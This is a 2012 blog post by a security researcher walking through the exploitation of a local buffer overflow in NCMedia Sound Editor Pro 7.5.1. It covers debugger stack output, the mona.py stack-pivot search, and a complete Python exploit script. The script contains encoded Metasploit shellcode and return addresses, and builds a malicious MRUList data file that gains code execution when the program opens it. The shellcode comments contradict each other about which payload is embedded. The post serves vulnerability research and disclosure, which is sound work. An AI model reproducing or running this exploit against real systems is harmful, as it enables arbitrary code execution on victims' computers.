Julien Ahrens

Vulnerability Intel | ROP Gadget Hunter | Privacy Enthusiast | Full-time BugBounty hunter | @Hacker0x01 MVH | @SynackRedTeam member | on a world-trip

Exploiting the NCMedia Sound Editor Pro v7.5.1 MRUList201202.dat File Handling Vulnerability with the help of mona.py

16 Sep 2012 » Advisory, Exploit

My latest finding: A classic buffer overflow. And this time I’ve used the great mona.py script created by the corelan team to exploit the vulnerability. It helps to find memory addresses for all of your stack adjustment needs (beside this, the script has got a lot of other powerful functions too).

During the investigations on the vulnerability I recognized that it’s quite a long way from the current position at crash-time (0x0012E3E8) to the overwritten part of the Stack (0x0012E7E8):

0012E3E8   7C9132A8  RETURN to ntdll.7C9132A8
0012E3EC   0012E4D0
0012E3F0   0012F800  ASCII "AAAABBBBCCCCCCCCCCC"
0012E3F4   0012E4EC
0012E3F8   0012E4A4
0012E3FC   0012F800  Pointer to next SEH record
0012E400   7C9132BC  SE handler
0012E404   0012F800  ASCII "AAAABBBBCCCCCCCCCCC"
0012E408  /0012E4B8
0012E40C  |7C91327A  RETURN to ntdll.7C91327A from ntdll.7C913282
0012E410  |0012E4D0
0012E414  |0012F800  ASCII "AAAABBBBCCCCCCCCCCC"
.......
0012E7E8   41414141
0012E7EC   41414141
0012E7F0   41414141
0012E7F4   41414141
0012E7F8   41414141

So you need to jump a lot of bytes to get to the shellcode. Therefor the mona.py script has got a quite cool function:

!mona stackpivot

It looks for all kinds of “stack pivots” (or easier to say “stack adjustments”) in the debbugged application and generates a log-file with all of them including possible protection mechanisms like ASLR or SafeSEH. Since you need roughly 1000 bytes to get to the shellcode, you can now have a look at the mona output and choose one, which moves the ESP to your desired position like e.g.:

0x004d893e : {pivot 1036} :  # ADD ESP,404 # POP EDI # POP ESI # RETN    ** [SoundEditorPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Programme\Sound Editor Pro\SoundEditorPro.exe) **   |  startnull {PAGE_EXECUTE_READ}

This moves the ESP 1036 bytes directly into the shellcode and makes Exploit - development again a lot more easier than doing everything by hand.

Finally my exploit looks like this:

#!/usr/bin/python

# Exploit Title: NCMedia Sound Editor Pro v7.5.1 MRUList201202.dat File Handling Local Buffer Overflow
# Version:       7.5.1
# Date:          2012-08-07
# Author:        Julien Ahrens
# Website:       https://www.rcesecurity.com
# Software Link: http://www.soundeditorpro.com/
# Tested on:     Windows XP SP3 Professional German
# Howto:         Copy MRUList201202.dat to %appdata%\Sound Editor Pro\ --> Launch app --> Click on "File" Menu

from struct import pack

file="MRUList201202.dat"

# windows/exec CMD=calc.exe 
# Encoder: x86/shikata_ga_nai
# powered by Metasploit 
# msfpayload windows/messagebox TITLE="Inshell.net" TEXT="Hacked by MrTuxracer" ICON="WARNING" R | msfencode -b '\x00\x0d\x0a'

shellcode = ("\xdd\xc0\xbf\x40\x06\xad\x1a\xd9\x74\x24\xf4\x5d\x33\xc9" +
"\xb1\x46\x31\x7d\x17\x83\xed\xfc\x03\x3d\x15\x4f\xef\x64" +
"\xf2\x14\xc9\xe2\x21\xdf\xdb\xd8\x98\x68\x2d\x15\xb8\x1d" +
"\x3c\x95\xca\x54\xb3\x5e\xba\x84\x40\x26\x4b\x3e\x28\x86" +
"\xc0\x76\xed\x89\xce\x03\xfe\x4c\xee\x3a\xff\x8f\x90\x37" +
"\x6c\x6b\x75\xc3\x28\x4f\xfe\x87\x9a\xd7\x01\xc2\x50\x6d" +
"\x1a\x99\x3d\x51\x1b\x76\x22\xa5\x52\x03\x91\x4e\x65\xfd" +
"\xeb\xaf\x57\xc1\xf0\xe3\x1c\x01\x7c\xfc\xdd\x4d\x70\x03" +
"\x19\xba\x7f\x38\xd9\x19\xa8\x4b\xc0\xe9\xf2\x97\x03\x05" +
"\x64\x5c\x0f\x92\xe2\x38\x0c\x25\x1e\x37\x28\xae\xe1\xaf" +
"\xb8\xf4\xc5\x33\xda\x37\xb7\x43\x35\x6c\x31\xb6\xcc\x4e" +
"\x2a\xb6\x81\x40\x47\x94\xf5\xc2\x68\xe7\xf9\x74\xd3\x13" +
"\xbd\xf9\x04\xf9\xb2\x82\xa9\xd9\x66\x65\x5f\xde\x78\x8a" +
"\xe9\x65\x8f\x1d\x86\x09\xaf\x9c\x3e\xe2\x9d\x30\xdb\x6c" +
"\x97\x3f\x46\x1e\xdf\x9c\xac\xd4\x56\xfa\xfb\x17\x3d\x07" +
"\x8d\x25\xee\xbc\x25\x0b\x42\x7f\xb2\x57\x79\x2d\x55\x06" +
"\x7e\x2e\x5a\xa0\xee\xb4\xd1\x68\x87\x53\x76\xe4\x79\xf4" +
"\xcf\x9a\xf6\x6c\xe1\xb9\x71\x30\x25\x36\x0b\x2a\x4d\x10" +
"\x2b\x8d\xae\xc8\x4a\xae\xcb\x7a\xe5\x64\x61\x02\x87\xec" +
"\xf0\xd2\x2a\x9f\x6a\x77\xd1\x7f\x09\x1f\x51\xe1\xae\xb4" +
"\x50\x28\xb8\x06\xb7\xbe\x30\x77\x86\x6c\x28\x47\xba\xc1" +
"\xff\x58\xec\xd3\x3f\xf6\xf2\x41\xc8")

junk1="\x41" * 12
nopsled="\x90" * 20
junk2="\x42" * (4108 - len(shellcode) - len(nopsled))
eip=pack('<L',0x004d893e) # ADD ESP,404 # POP EDI # POP ESI # RETN from SoundEditorPro.exe
esp=pack('<L',0x7e8236d9) # CALL ESP from shell32.dll

poc=junk1 + esp + nopsled + shellcode + junk2 + eip

try:
    print "[*] Creating exploit file...\n"
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!"
except:
    print "[!] Error while creating file!"

And it works:

To execute my shellcode I had to use a CALL from the shell32.dll which makes the Exploit unreliable on other systems than Windows XP SP3. The executable itself contains a lot of CALLs and JMPs to the ESP, but however for some reasons I cannot use addresses with two zeros in front for the CALL ESP function, otherwise it completely breaks my exploit. Don’t know why yet. Still investigating. There is always a way! :)